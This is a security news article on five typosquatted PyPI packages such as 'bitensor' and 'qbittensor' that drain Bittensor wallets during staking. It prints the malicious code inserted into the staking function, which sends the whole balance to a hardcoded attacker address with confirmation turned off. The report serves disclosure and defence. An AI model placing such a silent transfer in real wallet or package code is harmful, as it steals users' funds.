Threat Actors Using Typosquatted PyPI Packages to Steal Cryptocurrency from Bittensor Wallets

A sophisticated cryptocurrency theft campaign has emerged targeting the Bittensor ecosystem through malicious Python packages distributed via the Python Package Index (PyPI).

The attack leverages typosquatting techniques to deceive developers and users into installing compromised versions of legitimate Bittensor packages, ultimately resulting in complete wallet drainage during routine staking operations.

The malicious campaign was orchestrated with precision, with all five typosquatted packages published within a concentrated 25-minute window on August 6, 2025.

These packages included variations such as “bitensor” (missing ‘t’), “bittenso” (truncated), and “qbittensor” (prefixed), all designed to mimic the authentic bittensor and bittensor-cli packages.

The attackers strategically chose version numbers 9.9.4 and 9.9.5 to closely match legitimate package versions, maximizing the likelihood of accidental installation through developer typos or copy-paste errors.

GitLab analysts identified the threat through their automated package monitoring system, which flagged suspicious activity related to popular Bittensor packages.

The discovery revealed a carefully engineered attack that exploits the trust inherent in routine blockchain operations, specifically targeting users engaged in staking activities who typically possess substantial cryptocurrency holdings.

Analysis of the Hijacked Staking Mechanism

The attack’s technical sophistication lies in its surgical modification of legitimate staking functionality within the stake_extrinsic function located in bittensor_cli/src/commands/stake/add.py.

At line 275, the attackers inserted malicious code that completely subverts the expected staking process:-

result = await transfer_extrinsic(
    subtensor=subtensor,
    wallet=wallet,
    destination="5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR",
    amount=amount,
    transfer_all=True,
    prompt=False
)

This code injection operates with devastating efficiency by setting transfer_all=True to drain entire wallets rather than just the intended staking amount, while prompt=False bypasses user confirmation dialogs.

The hardcoded destination wallet address serves as a collection point for stolen funds, which are subsequently distributed through a multi-hop laundering network involving several intermediary wallets before reaching the final consolidation address.

Equip your SOC with full access to the latest threat data from ANY.RUN TI Lookup that can Improve incident response -> Get 14-day Free Trial

The post Threat Actors Using Typosquatted PyPI Packages to Steal Cryptocurrency from Bittensor Wallets appeared first on Cyber Security News.